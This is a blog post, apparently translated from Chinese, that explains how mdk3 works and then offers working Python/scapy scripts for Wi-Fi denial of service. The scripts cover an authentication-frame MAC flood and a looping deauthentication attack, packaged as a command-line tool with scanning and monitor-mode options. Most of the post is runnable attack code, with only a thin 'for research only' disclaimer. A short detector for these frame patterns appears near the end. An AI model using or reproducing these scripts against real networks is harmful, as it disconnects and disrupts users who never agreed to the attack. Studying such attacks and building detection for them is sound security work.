py_wifi_dos
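Preface
About ten days remain until winter break, and I spent this week tinkering in the lab again. I suddenly became interested in mdk3, gradually worked out how it operates, and wrote a script.
Reminder: this article is for security research and learning only; the author is not responsible if you break the law and get caught.
Analyzing mdk3's attacks
First, put the wireless NIC into monitor mode: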
airmon-ng start <iface>
First, the MAC flood attack:
mdk3 <iface> a -a <bssid>
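Before the attack:
During the attack:
Packets captured in Wireshark:
Analysis
Receiver address: the receiving address (client)
Destination address: the destination address (client)
Transmitter address: the transmitting address (AP)
BSSID: BSSID
Hypothesis:
A MAC flood generates MAC addresses in bulk and then builds packets that request authentication from the AP
(that is, only request packets are needed; no response packets have to be constructed).
So the first and second are the same; next, look up the corresponding functions in scapy.
Putting the three together and checking the help:
RadioTap(): after comparison, the defaults can be kept.
Dot11(): addr1 is the target MAC address; to attack all clients use FF:FF:FF:FF:FF:FF, or give a specific MAC.
addr2 and addr3 are the AP address.
Dot11Beacon(): keep the defaults or change them as needed.
MAC flood attack code: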
#coding:utf-8
'''
@author:九世
@time:2019/1/3
'''
from scapy.all import *
import threading
n=[]
m=[]
yser=input("RMAC:")
def dos(mac):
    for k in range(65, 71):
        n.append(chr(k))
    for q in range(0, 9):
        m.append(q)
    # Generate MAC addresses in bulk
    for v in n:
        for l in m:
            for k in n:
                for w in m:
                    for s in n:
                        for mq in m:
                            for q in n:
                                for p in m:
                                    for o in n:
                                        for g in m:
                                            for we in n:
                                                for wq in m:
                                                    macs = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
                                                    data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macs),addr3=mac,addr4=mac)/Dot11Beacon(timestamp=70180) # Build the packet
                                                    sendp(data,iface="mon0")
if __name__ == '__main__':
    t=threading.Thread(target=dos,args=("{}".format(yser),))
    t.start()
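Attack result:
Deauth attack
A deauth attack forges the AP's disconnect packets and sends them to both the AP and the clients, so that they cannot connect to the network.
That description gives one key piece of information: two packets have to be built, one sent to the AP and one sent to the client, to carry out the spoofing.
Wireshark capture analysis
Spoofing the AP
The scapy functions used are: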
RadioTap()/Dot11()/Dot11Deauth()
Demo code:
from scapy.all import *
# Build one packet addressed to the clients and one addressed to the AP
while True:
    deauth_pkt1 = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="<you MAC>", addr3="<you MAC>") / Dot11Deauth()
    deauth_pkt2 = RadioTap()/Dot11(addr1="<you MAC>", addr2="ff:ff:ff:ff:ff:ff", addr3="ff:ff:ff:ff:ff:ff") / Dot11Deauth()
    sendp(deauth_pkt1,iface="mon0")
    sendp(deauth_pkt2,iface="mon0")
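Test result:
I also ran a test against a phone, but without a video the effect is hard to see; readers can take the code and test it themselves.
Combined code
A person ends up at a disadvantage because of their own lack of ability. -- «Black-haired Kaneki * Kaneki * No. 340 Kaneki * White-haired Kaneki * Sasaki Haise * Black Reaper Kaneki * One-Eyed King Kaneki * Angel-form Kaneki»
Code: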
'''
@author:jiushi
@time:2019/1/4
'''
#-*-coding:utf-8-*-
from scapy.all import *
import optparse
import subprocess
banner="""
signature:今生今世非你不娶
"""
print(banner)
print('[!] Reminder: This tool needs to install the airmon-ng tool.')
print('')
print('')
print('1.Generate a large number of mac addresses for flood attacks')
print('2.Dot11Deauch attack')
print('3.SSID and MAC scan')
print('4.NIC open monitor mode')
print('')
print('')
mac_list=[]
ssid_list=[]
def main():
    parser=optparse.OptionParser()
    parser.add_option('-r',dest='rmac',help='rhost_mac')
    parser.add_option('-m',dest='macaddresses',help='mac addresses',action='store_true')
    parser.add_option('-d',dest='deauch',help='Deauch attack',action='store_true')
    parser.add_option('-s',dest='scan',help='ssid and macscan',action='store_true')
    parser.add_option('-f',dest='iface',help='network iface',action='store')
    parser.add_option('-t',dest='start',help='nic open monitor mode',action='store_true')
    (options,args)=parser.parse_args()
    if options.macaddresses and options.iface and options.rmac:
        ifaces=options.iface
        rsmac=options.rmac
        mac_addresses(ifaces,rsmac)
    elif options.deauch and options.iface and options.rmac:
        iface2=options.iface
        rs2mac=options.rmac
        attack(iface2,rs2mac)
    elif options.scan and options.iface:
        iface3=options.iface
        # Truncate the results file before a new scan
        xj=open('save.txt','w')
        xj.close()
        print('[+] SSID scan:')
        print('[!] Ctrl+C stop')
        print('')
        print('')
        sniff(iface=iface3,prn=scan)
    elif options.start and options.iface:
        iface0=options.iface
        start(iface0)
    else:
        parser.print_help()
        exit()
def mac_addresses(iface1,rsmac):
    print('[+] mac_addresses')
    print('')
    n=[]
    m=[]
    for k in range(65, 71):
        n.append(chr(k))
    for q in range(0, 9):
        m.append(q)
    for v in n:
        for l in m:
            for k in n:
                for w in m:
                    for s in n:
                        for mq in m:
                            for q in n:
                                for p in m:
                                    for o in n:
                                        for g in m:
                                            for we in n:
                                                for wq in m:
                                                    macss = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
                                                    data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macss),addr3=rsmac,addr4=rsmac)/Dot11Beacon(timestamp=70180)
                                                    sendp(data,iface=iface1)
def attack(iface2,rs2mac):
    print('[+] Dot11Deauth attak')
    print('')
    while True:
        data2=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=rs2mac,addr3=rs2mac)/Dot11Deauth()
        data3=RadioTap()/Dot11(addr1=rs2mac,addr2="ff:ff:ff:ff:ff:ff",addr3="ff:ff:ff:ff:ff:ff")/Dot11Deauth()
        sendp(data2,iface=iface2)
        sendp(data3,iface=iface2)
def scan(jianting):
    # Record each beacon (management type 0, subtype 8) once per transmitter MAC
    if jianting.haslayer(Dot11Elt):
        if jianting.type==0 and jianting.subtype==8:
            if not jianting.addr2 in mac_list:
                mac_list.append(jianting.addr2)
                ssid_list.append(jianting.info)
                # SSIDs are arbitrary bytes, so do not let a non-UTF-8 name stop the sniffer
                ssid=jianting.info.decode('utf-8',errors='replace')
                print('[+] MAC:{} SSID:{}'.format(jianting.addr2,ssid))
                with open('save.txt','a') as f:
                    print('MAC:{} SSID:{}'.format(jianting.addr2,ssid),file=f)
def start(iface0):
    print('[+] start mon')
    print('')
    print('')
    # Pass the interface name as a separate argument so it is never parsed by a shell
    subprocess.run(['sudo','airmon-ng','start',iface0])
if __name__ == '__main__':
    main()
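Results:
SSID scan
MAC flood attack
Deauth attack
Defending against mdk3 attacks: some say the only option is to wait for a protocol update, others say there are defense tutorials on YouTube. Readers can look into it themselves.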
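A detection-side view of the two frame patterns analyzed above (authentication frames from many transmitter MACs toward one BSSID, and deauthentication frames, including the one whose transmitter is the broadcast address), as an added example that is not part of the original post. It parses bare 802.11 headers with radiotap already stripped; the thresholds, alert names, and sample frames are constructed assumptions.

```python
import struct
from collections import defaultdict

AUTH, DEAUTH = 11, 12            # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join("%02x" % x for x in b)

def parse_mgmt(raw):
    """Return (subtype, addr1, addr2, addr3), or None if not a management frame."""
    if len(raw) < 24 or ((raw[0] >> 2) & 0x3) != 0:
        return None
    return raw[0] >> 4, mac(raw[4:10]), mac(raw[10:16]), mac(raw[16:22])

def detect(frames, window=1.0, auth_sources=20, deauth_count=10):
    """frames: iterable of (timestamp, raw). Returns a set of (alert, address)."""
    senders = defaultdict(set)   # (time bucket, bssid) -> distinct addr2 in auth frames
    deauths = defaultdict(int)   # (time bucket, bssid) -> deauth frames seen
    alerts = set()
    for ts, raw in frames:
        hdr = parse_mgmt(raw)
        if hdr is None:
            continue
        subtype, addr1, addr2, addr3 = hdr
        bucket = int(ts // window)
        if subtype in (AUTH, DEAUTH) and addr2 == BROADCAST:
            # No station legitimately transmits from the broadcast address
            alerts.add(("broadcast-transmitter", addr1))
        elif subtype == AUTH:
            senders[bucket, addr3].add(addr2)
            if len(senders[bucket, addr3]) > auth_sources:
                alerts.add(("auth-flood", addr3))
        elif subtype == DEAUTH:
            deauths[bucket, addr3] += 1
            if deauths[bucket, addr3] > deauth_count:
                alerts.add(("deauth-flood", addr3))
    return alerts

def build(subtype, a1, a2, a3):
    """Constructed sample frame: frame control, duration, three addresses, seq."""
    to_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
    return struct.pack("<BBH", subtype << 4, 0, 0) + to_bytes(a1) + to_bytes(a2) + to_bytes(a3) + b"\x00\x00"

AP = "aa:bb:cc:00:00:01"         # constructed AP address, not from the article
def sample_capture():
    auth = [(0.01 * i, build(AUTH, BROADCAST, "a0:b1:c2:d3:e4:%02x" % i, AP)) for i in range(30)]
    deauth = [(2 + 0.01 * i, build(DEAUTH, BROADCAST, AP, AP)) for i in range(15)]
    spoof = [(3.0, build(DEAUTH, AP, BROADCAST, BROADCAST))]
    return auth + deauth + spoof
```

Calling `detect(sample_capture())` reports all three alerts for the constructed AP; a handful of authentication frames from distinct clients stays below the thresholds.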
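GitHub address: python/wifidos at master · 422926799/python · GitHub
Summary
When you need to analyze packets, compare and analyze them patiently. Look up the corresponding protocol functions in scapy, then build and send the packets. If you do not understand something, search for it promptly.
When reposting, please state: reposted from 422926799.github.io
Please credit the source when reposting. You are welcome to verify the sources cited in the article and to point out any errors or unclear wording.
Article title: py_wifi_dos
Author: 九世
Published: 2019-01-04, 19:31:34
Last updated: 2019-04-19, 20:36:16
Original link: http://jiushill.github.io/posts/37ff80c8.html
Copyright notice: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.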